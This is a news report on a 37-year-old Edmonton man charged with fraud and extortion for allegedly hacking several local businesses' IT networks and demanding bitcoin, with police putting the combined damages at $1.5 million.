Hacker Infiltrates the Company's IT Network; Businesses affected suffered an estimated $1.5 Million damages.

A 37-year-old man from Edmonton is facing fraud and extortion charges against him after a local business network was allegedly hacked by him.

Police said in a release that they received a report about the alleged hacking of a local business's IT infrastructure in July 2017. They believe the suspect infiltrated the company's IT network, took control of its email and smartphone servers, and demanded payment in bitcoin to prevent further harm to the business.

The EPS Cyber Crime Investigations Unit investigated the case and identified the alleged suspect.

Police believe the same man is responsible for hacking the networks of at least four other Edmonton-based companies.

“Once the networks were accessed, the suspect targeted financial data, including online store accounts and email accounts, from the companies as well as the employees,” said Const. Phil Hawkins.

He added that the intrusions caused a significant loss to the businesses, including the time and resources spent recovering, with combined damages estimated at $1.5 million.


Jeffrey Johnston, 37, is charged with 18 criminal offences, including three counts each of mischief in relation to computer data, two counts each of fraudulently obtaining computer service, mischief in relation to data and unauthorized use of computer services, and single counts of theft over $5,000.